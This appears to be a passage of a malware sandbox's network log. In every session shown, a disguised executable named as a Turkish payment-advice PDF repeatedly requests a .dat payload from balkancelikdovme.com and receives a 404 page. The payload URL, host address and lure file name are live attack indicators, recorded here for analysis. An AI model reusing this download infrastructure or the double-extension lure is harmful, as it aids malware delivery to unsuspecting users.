      2024-12-16 13:25:26 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      31192.168.2.549831185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:25:27 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:25:28 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:25:27 GMT
      vary: User-Agent
      2024-12-16 13:25:28 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      32192.168.2.549837185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:25:29 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:25:29 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:25:29 GMT
      vary: User-Agent
      2024-12-16 13:25:29 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      33192.168.2.549841185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:25:31 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:25:31 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:25:31 GMT
      vary: User-Agent
      2024-12-16 13:25:31 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      34192.168.2.549846185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:25:33 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:25:33 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:25:33 GMT
      vary: User-Agent
      2024-12-16 13:25:33 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      35192.168.2.549850185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:25:35 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:25:35 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:25:35 GMT
      vary: User-Agent
      2024-12-16 13:25:35 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      36192.168.2.549856185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:25:36 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:25:37 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:25:37 GMT
      vary: User-Agent
      2024-12-16 13:25:37 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      37192.168.2.549862185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:25:38 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:25:39 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:25:39 GMT
      vary: User-Agent
      2024-12-16 13:25:39 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      38192.168.2.549866185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:25:40 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:25:41 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:25:40 GMT
      vary: User-Agent
      2024-12-16 13:25:41 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      39192.168.2.549872185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:25:42 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:25:43 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:25:42 GMT
      vary: User-Agent
      2024-12-16 13:25:43 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      40192.168.2.549877185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:25:44 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:25:44 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:25:44 GMT
      vary: User-Agent
      2024-12-16 13:25:44 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      41192.168.2.549881185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:25:46 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:25:46 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:25:46 GMT
      vary: User-Agent
      2024-12-16 13:25:46 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      42192.168.2.549888185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:25:48 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:25:49 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:25:48 GMT
      vary: User-Agent
      2024-12-16 13:25:49 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      43192.168.2.549894185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:25:50 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:25:50 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:25:50 GMT
      vary: User-Agent
      2024-12-16 13:25:50 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      44192.168.2.549900185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:25:52 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:25:52 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:25:52 GMT
      vary: User-Agent
